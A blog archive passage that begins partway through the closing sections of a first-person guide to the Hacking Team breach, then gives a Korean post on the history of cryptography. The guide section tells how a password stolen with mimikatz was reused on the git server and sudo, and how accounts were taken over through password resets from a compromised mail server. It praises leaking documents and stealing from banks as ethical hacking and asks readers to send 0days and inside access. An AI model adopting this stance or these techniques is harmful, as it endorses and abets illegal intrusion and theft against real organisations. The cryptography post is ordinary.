password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.


--[ 17 - Conclusion ]-----------------------------------------------------------

That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]--------------------------------------------------------------

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----



                      If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

 

 

http://www.boannews.com/media/view.asp?idx=50341

http://pastebin.com/raw/0SNSvyjJ

 Posted by at 11:15 AM

암호의 역사

 IT, 정보보호  Comments Off on 암호의 역사
Jun 122015
 

KISA에 있는 암호의 역사에 관한 다음 페이지에서 내가 저자로 참여한 “훤히 보이는 정보보호”의 내용을 거의 그대로 이용했군요. 내가 쓴 책의 내용이 이렇게 활용되는 것을 보니 매우 반갑습니다. 그런데 출처를 정확히 밝히고 이용하면 좋았을텐데요.

http://seed.kisa.or.kr/iwt/ko/intro/EgovHistory.do

인류의 수천 년 역사 속에서 위대한 왕과 장군들은 모두 효율적인 통신 수단에 의존해 나라를 다스리고 군대를 움직여 왔다 해도 과언이 아니다. 하지만 동시에 지도자들은 이러한 통신 내용이 적의 손에 들어가 귀중한 비밀이 누설되거나 중요한 정보가 들어가지 않을까 늘 우려했다. 그런 의미에서 적이 중요한 정보를 가로챌 수 있다는 위협이야말로 암호를 발시킨 원동력이었다고 할 수 있다. 이렇듯 비밀 보장이 절실히 필요해짐에 따라 각국 정부는 가능한 한 가장 안전한 암호를 만들어 내고, 이를 이용해 통신의 보안성을 확보하는 부서를 운영하게 된다.

이에 맞서 적국에서는 거기에 담긴 비밀을 빼내려는 암호 해독가를 동시에 양성했다. 암호 해독가들은 언어를 재료로 이용하는 연금술사로, 무작위로 모아놓은 듯한 부호에서 의미를 가진 단어를 뽑아내기 위해 일생을 바치는 신비하고도 특별한 분야의 사람들이다. 암호의 역사는 바로 암호를 만드는 사람들과 이를 해독하려는 사람들이 수백 년에 걸쳐 벌여온 전쟁의 역사이다. 지성을 무기로 한 이 군비 경쟁은 때로는 역사에 극적인 영향을 미치며 그 경로를 바꿔놓기도 했다.

암호의 어원은 그리스어의 비밀이란 뜻을 가진 크립토스(Kryptos)로 알려져 있다. 이는 평문을 해독 불가능한 형태로 변형하거나 암호화된 통신문을 원래의 해독 가능한 상태로 변환하기 위한 모든 수학적인 원리, 수단, 방법 등을 취급하는 기술이나 과학을 말한다. 즉, 암호란 중요한 정보를 다른 사람들이 보지 못하도록 하는 방법을 의미한다.

암호 기술의 발전 역사를 구분할 때 흔히 두 번의 큰 전환점을 기준으로 고대 암호, 근대 암호, 현대 암호 등의 세 단계로 나눠진다. 첫 번째 전환점은 1920년대, 1, 2차 세계 대전에서 무선 통신 기술의 발전을 기반으로 여러 가지 기계적, 전자적 암호 장치를 개발하고 사용한 것이었고, 두 번째 전환점은 1970년대 들어 컴퓨터 사용이 활발해지면서 컴퓨터를 이용한 암호 기술이 발전한 것이다.

이러한 전환점을 기준으로 고대로부터 1, 2차 세계 대전 이전가지 사용된 초보적인 암호 기술들을 고대 암호라고 하면, 1970년대까지 복잡한 기계 장치와 전자 장치들을 이용한 암호 기술을 근대 암호, 컴퓨터가 개발된 이후 컴퓨터를 이용하는 암호 기술을 현대 암호라고 부른다.

고대 암호

고대 봉건 사회에서는 황제나 군주가 지방 관리에게 보내는 비밀문서, 전쟁 중의 작전 지시와 보고, 첩자들과의 통신 등 전쟁이나 첩보 시에 정보를 전달해야 하는 경우에 다양한 비밀 통신 기법들이 사용되었다. 예를 들어, 멀리 기밀 정보를 전달해야 하는 경우에는 사자의 머리를 깎고 메시지를 쓴 후 머리를 길러서 보내면 받는 측에서는 사자의 머리를 깎고 메시지를 읽도록 하였다.

또 종이에 쓴 메시지가 그냥 보이지 않지만 불빛에 약품 처리를 하면 메시지가 나타나도록 하는 방법, 비밀 노출을 방지하기 위해 말로 전달하도록 하는 방법 등이 다양하게 사용되었다. 이러한 비밀 통신 방법을 스테가노그래피(Steganography)라고 하는데 적들도 이 통신 방식을 알고 있으면 비밀을 유지하기 어렵다는 한계를 갖고 있다.

스키테일 암호

기원전 400년경 고대 그리스의 군사들은 스키테일 암호라고 불리는 전치 암호(Transposition cipher, 문자의 위치를 서로 바꾸는 암호)를 사용한 기록이 있다. 특정 지름을 갖는 막대에 종이를 감고 평문을 횡으로 쓴 다음 종이를 풀면 평문의 각 문자는 재배치되어 정보를 인식할 수 없게 되는데, 암호문 수신자가 송신자가 사용한 막대와 지름이 같은 막대에 종이를 감고 횡으로 읽으면 평문을 읽을 수 있다. 여기서 막대의 지름은 송신자와 수신자 사이에 공유된 비밀키가 된다.

시저(Caesar) 암호

로마의 황제였던 줄리어스 시저(Julius Caesar)는 시저 암호라고 불리는 환자 암호(substitution cipher, 문자를 다른 문자로 치환하는 암호)를 사용하였다. 시저는 가족과 비밀 통신을 할 때 각 알파벳순으로 세자씩 뒤로 물려 읽는 방법으로 글을 작성했다. 즉 A는 D로, B는 E로 바꿔 읽는 방식이었다. 수신자가 암호문을 복호화하려면 암호문 문자를 좌측으로 3문자씩 당겨서 읽으면 원래의 평문을 얻을 수 있다. 송신자와 수신자는 몇 문자씩 이동할지를 비밀키로 하여 바꿔가면서 사용할 수 있다.

시저는 브루투스에게 암살당하기 전 가족들로부터 다음과 같은 긴급 통신문을 받았다. 시저가 받은 편지에는 ‘EH FDUHIXO IRU DVVDVVLQDWRU’라 되어 있었다. 3글자씩 당겨서 읽어보면 뜻은 ‘BE CAREFUL FOR ASSASSINATOR’, 즉 ‘암살자를 주의하라’는 것이었다. 당시 시저의 권세를 시기했던 일당은 시저를 살해할 암살 음호를 꾸미고 있었으며 시저 자신도 이를 어느 정도 눈치 채고 있었다. 하지만 시저는 구체적으로 암살자가 누구인지 알 수 없었다. 결국 암호문을 전달받은 당일 시저는 원로원에서 전혀 생각지도 못했던 브루투스에게 암살당하면서 “브루투스, 너마저…….”라는 말을 남겼다.

악보 암호

악보 암호는 전설적인 스파이 마타하리(본명은 마그레타 G. 젤러, Margaretha Geertruida Zelle)가 사용했던 방식이다. 마타하리는 일명 ‘첩보원 H21’이란 이름으로 프랑스 장교에 접근해 군사 기밀 정보를 독일에 빼돌렸는데, 이때 비밀 통신에 사용된 암호가 악보였다. 일정한 형태의 음표에 알파벳 하나씩을 대응시킨 형태로 얼핏 보기에 평범한 악보처럼 보이지만, 실제로 연주하면 전혀 ‘음악’이 되지 않는다. 마타하리의 첩보 활동은 20여만 명에 달하는 프랑스군을 죽음으로 몰고 갔다. 그녀는 제 1차 세계 대전이 끝나기 1년 전 프랑스 정보부에 체포돼 사형 당했다.

근대 암호

17세기 근대 수학의 발전과 함께 암호 기술도 발전하기 시작했는데, 프랑스 외교관이었던 Vigenere가 고안한 키워드를 이용한 복수 시저 암호형 방식, Playfair가 만든 2문자 조합 암호 등 다양한 암호 방식으로 발전하였다.

20세기 들어서는 통신 기술의 발전과 기계식 계산기에 대한 연구를 바탕으로 두 차례의 세계 대전을 통해 암호 설계와 해독에 대한 필요성이 높아지면서 암호에 대한 연구가 더욱 활발하게 진행되었다. 근대 암호의 이론적 기초가 된 논문은 1920년 Freidman이 발표한 ‘일치 반복률과 암호 응용’과 1949년 Shannon이 발표한 ‘비밀 시스템의 통신 이론’을 들 수 있다. Shannon은 논문에서 일회성 암호 체계가 안전함을 증명했고, 암호 체계 설계의 두 가지 기본 원칙인 ‘혼돈과 확신 이론’을 제시하였다. 암호 체계를 설계함에 있어 ‘혼돈(Confusion)’은 평문과 암호문 사이의 상관관계를 숨기는 반면, ‘확산(Diffusion)’은 평문의 통계적 성격을 암호문 전반에 확산시켜 숨기는 역할을 한다. 혼돈과 확산이라는 두 가지 개념은 오늘날의 암호 체계 설계에도 여전히 적용되고 있다.

Freidman은 2차 세계 대전 중 독일군이 사용하던 에니그마(Enigma) 암호와 일본군이 사용하던 무라사끼 암호를 해독한 사람으로 유명하다. 에니그마 암호는 각기 다른 몇 개의 암호판을 전기적으로 연결하여 원문을 입력하면 전기적 연결에 의해 새로운 암호문을 출력하는 방식으로 이 기계가 존재하지 않으면 암호를 풀 수 없다.

미드웨이 해전에서의 암호 전쟁

태평양 전쟁 당시 일본의 진주만 공습으로 큰 피해를 입고 전력이 약화됐던 미국은 일본의 그 다음 공격 목표가 어디인지를 알아내야 했다. 1942년 4월, 하와이 주둔 미국 해군 정보부의 암호 해독반 블랙 챔버는 일본군의 무전이 증가하고 있음을 발견했다. 이미 일본 해군의 암호 체계인 JN-25를 해독하고 있던 해독반은 AF라는 문자가 자주 나타난다는 사실에 주목했다. AH는 진주만을 뜻하는 것이었다. 암호 해독반의 지휘관이었던 조셉 로슈포르 중령은 AF를 미드웨이 섬이라고 생각했다. 일본의 정찰기가 ‘AF 근처를 지나고 있다’는 내용의 무선 보고를 해독한 적이 있었던 그는 정찰기의 비행경로를 추정해본 결과 AF가 미드웨이 섬일 것이라는 심증을 갖게 된 것이다.

로슈포르 중령은 체스터 니미츠 제독에게 일본군의 침공이 임박했다는 것과 AF가 자주 언급된다는 점, 그리고 AF가 미드웨이 섬일 것이라는 보고를 한 후, 미드웨이 섬의 담수 시설이 고장 났다는 내용의 가짜 전문을 하와이로 평문 송신하게 하자고 건의했다. 3월에 미드웨이 섬 근처에 일본 해군의 비행정이 정찰 왔던 것을 알고 있던 니미츠 제독은 이 건의를 받아들였다. 사실 미드웨이 섬의 정수 시설은 아무런 문제가 없었다. 이틀 후, 도청된 일본군 암호 중 ‘AF에 물 부족’이라는 내용이 해독되었다. 이로써 일본군의 다음 공격 목표가 미드웨이 섬이라는 것이 분명해진 것이다.

미군은 암호 해독을 통해 일본의 공격 목표가 미드웨이라는 사실을 알아낸 후 전투에 대비하고 반격을 준비하여 일본의 태평양 함대를 격파하고 전쟁을 승리로 이끌 수 있었다.

현대 암호

현대 암호는 1970년대 후반 스탠퍼드 대학과 MIT 대학에서 시작되었다. 1976년 스탠퍼드 대학의 Diffie와 Hellman은 ‘암호의 새로운 방향(New Directions in Cryptography)’이라는 논문에서 처음으로 공개키 암호의 개념을 발표하였다. 종래의 관용 암호 방식 또는 대칭키 암호 방식에서는 암호화키와 복호화키가 동일한 비밀키를 사용하기 때문에 송신자와 수신자는 비밀 통신을 하기 전에 비밀키를 공유하고 있어야 한다. 반면 공개키 암호 방식에서는 하나의 쌍이 되는 공개키와 비밀키를 생성하여 암호화에 사용되는 공개키는 공개하고, 복호화에 사용되는 비밀키는 사용자가 안전하게 보관하도록 한다. 공개키 암호 방식에서는 송신자와 수신자가 사전에 키를 공유할 필요가 없기 때문에 불특정 다수 사용자 간에 사전 준비가 없이도 암호 통신망을 구축하는데 유용하게 사용할 수 있다.

이어 1978년 MIT 대학의 Rivest, Shamir, Adleman은 소인수 분해 문제에 기반을 둔 RSA 공개키 암호를 개발했는데, 이것은 오늘까지도 가장 널리 사용되는 공개키 암호 방식이다. 공개키 암호의 도입은 현대 암호의 발전에 중요한 계기가 되었다.

한편, 1977년 미국 상무성 표준국(NBS, 현 NIST)은 전자계산기 데이터 보호를 위한 암호 알고리즘을 공개 모집하여, IBM 사가 제안한 DES (Data Encryption Standard)를 표준 암호 알고리즘으로 채택했다. DES의 표준화를 계기로 하여 금융 시스템을 중심으로 상업용 암호화의 이용이 증가하게 되었고 컴퓨터 통신망을 이용한 문서 전송, 전자 자금 이체 등이 활성화되었으며 암호 방식이 일반인들에게 알려지고 널리 사용되는 계기가 되었다.

이전의 암호 방식에서는 사용하는 키뿐만 아니라 암호 알고리즘도 비밀로 하여 암호문의 비밀을 지키려고 하는 경우도 있었으나, 현대 암호에서는 암호 알고리즘을 공개하도록 하고 있다. 1883년 Auguste Kerckhoff는 암호 시스템의 안전성에 대해 ‘키 이외에 암호 시스템의 모든 것이 공개되어도 안전해야 한다’고 했는데 이것을 Kerckhoff’s principle이라고 한다. 이렇게 함으로써 암호 방식의 안전성을 공개적으로 검토하게 하여 안전성을 확인하는 것이다.

표준화된 암호와 표준화된 컴퓨팅 기기들을 사용하는 현대 암호에서는 암호 알고리즘을 감추기가 매우 어렵다. 또한 암호 알고리즘을 감춘다고 해서 암호의 보안성이 높아지는 것도 아니다. 비밀로 다루어진 암호 알고리즘이 일단 공개되고 나면 그 안전성에 문제가 발견되는 사례가 많다. 그러므로 암호 분야에서는 어떤 암호 알고리즘이 많은 암호 학자들에 의해 장기간 세부적으로 수행된 분석에서도 잘 견디어 낼 때까지는 그 알고리즘을 안전하다고 인정하지 않는다. 즉, 암호 체계는 ‘무죄가 증명될 때까지는 유죄’이다.

 

 Posted by at 5:28 PM